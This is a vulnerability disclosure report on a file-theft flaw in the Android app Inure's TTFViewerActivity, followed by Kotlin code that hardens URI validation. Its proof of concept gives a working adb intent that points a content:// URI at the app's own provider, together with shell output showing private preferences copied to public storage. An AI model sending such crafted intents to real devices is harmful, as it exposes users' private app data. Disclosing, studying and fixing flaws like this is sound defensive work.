Theft of Arbitrary Files due to lack of intent validation and insecure usage of provider paths in TTFViewerActivity.kt in hamza417/inure
Reported on
Aug 24th 2023
Description
Through the use of Oversecured, a leading vulnerability scanner for Android and iOS applications, we were able to detect a Theft of Arbitrary Files vulnerability within TTFViewerActivity.kt. Check the full issue definition in the image below:
Root Cause Analysis
The TTFViewerActivity failed to adequately validate the incoming intent.data before forwarding it to the openInputStream function, which allowed arbitrary files to be read. For instance, a content:// URI using the Inure application's own file provider authority could be supplied, which made it possible to read files from the app's internal directory.
Extraction of the opened files was possible because they were stored in a publicly accessible directory: the activity used context.getExternalFilesDir to save the files in that location.
This attack was chained with an insecure usage within the provider paths, which further contributed to the exploit:
Proof of Concept
Access your device shell using adb shell, then navigate to /storage/emulated/0/Android/data/app.simple.inure/files/font_cache in order to examine the contents of the directory. For now it's empty:
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la
total 6
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:18 .
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..
Send the following intent:
adb shell am start -n app.simple.inure/.activities.association.TTFViewerActivity -d "content://app.simple.inure.provider/root/data/data/app.simple.inure/shared_prefs/Preferences.xml" -a "android.intent.action.VIEW" -t "font/ttf"
Review the font_cache directory again and notice that Preferences.xml was saved:
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la
total 10
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:22 .
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..
-rw-rw---- 1 u0_a508 sdcard_rw 771 2023-08-25 07:22 Preferences.xml
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ cat Preferences.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<boolean name="apk_external_storage" value="false" />
<boolean name="is_external_storage" value="false" />
<int name="app_accent_color" value="-29592" />
<boolean name="dont_show_again" value="true" />
<int name="main_app_launch_count" value="13" />
<boolean name="is_custom_color" value="false" />
<int name="view_positions" value="7" />
<int name="notes_list_type" value="0" />
<boolean name="disclaimer_agreed" value="true" />
<string name="last_search_keyword"></string>
<string name="home_path">/data/user/0/app.simple.inure/app_HOME</string>
<long name="crash_timestamp" value="-1" />
<boolean name="deep_search_keyword_mode" value="false" />
</map>
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $
Impact
An application's internal directory and the files within it should never be accessible to other applications on the device. The reported vulnerability demonstrates that a malicious third-party application can, by sending a crafted intent to TTFViewerActivity, copy data from the Inure app's private directory into a publicly readable external storage directory and read it from there.
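The two root causes above (an unvalidated intent.data that is passed straight to openInputStream, and a copy written to getExternalFilesDir) can be addressed together. The following Kotlin is an added illustration of that hardening, not the project's own fix: the provider authority string is taken from the PoC, and the function names are hypothetical.

```kotlin
import android.content.Context
import android.content.Intent
import android.net.Uri
import android.util.Log
import java.io.File

// Hypothetical hardening for the flaw described in this report; not Inure's own code.
// Authority taken from the PoC intent above.
private const val OWN_PROVIDER_AUTHORITY = "app.simple.inure.provider"

sealed class FontSource {
    data class Accepted(val uri: Uri) : FontSource()
    data class Rejected(val reason: String) : FontSource()
}

// Reject any URI that would make the activity read its own app's files on
// behalf of the caller. Only content:// is accepted, and any authority owned
// by this package (not just the one literal string) is refused, so a second
// provider declared in the manifest cannot be used the same way.
fun validateFontUri(intent: Intent, ownPackage: String): FontSource {
    val uri = intent.data ?: return FontSource.Rejected("no data URI")
    if (uri.scheme != "content") {
        return FontSource.Rejected("only content:// URIs are accepted, got ${uri.scheme}")
    }
    val authority = uri.authority ?: return FontSource.Rejected("URI has no authority")
    if (authority == OWN_PROVIDER_AUTHORITY || authority.startsWith("$ownPackage.")) {
        return FontSource.Rejected("URI points at this app's own provider: $authority")
    }
    return FontSource.Accepted(uri)
}

// Copy the font into the app-private cache directory instead of
// getExternalFilesDir, so the copy is never readable from shared storage.
fun cacheFont(context: Context, uri: Uri): File? {
    val dir = File(context.cacheDir, "font_cache").apply { mkdirs() }
    val out = File(dir, "font_${System.currentTimeMillis()}.ttf")
    val input = context.contentResolver.openInputStream(uri) ?: return null
    input.use { src -> out.outputStream().use { dst -> src.copyTo(dst) } }
    return out
}

// Entry point the activity would call from onCreate with its incoming intent.
fun handleViewIntent(context: Context, intent: Intent): File? =
    when (val result = validateFontUri(intent, context.packageName)) {
        is FontSource.Accepted -> cacheFont(context, result.uri)
        is FontSource.Rejected -> { Log.w("TTFViewer", result.reason); null }
    }
```

With this in place the PoC intent above is refused at validateFontUri, and even an accepted font never lands under /storage/emulated/0/Android/data.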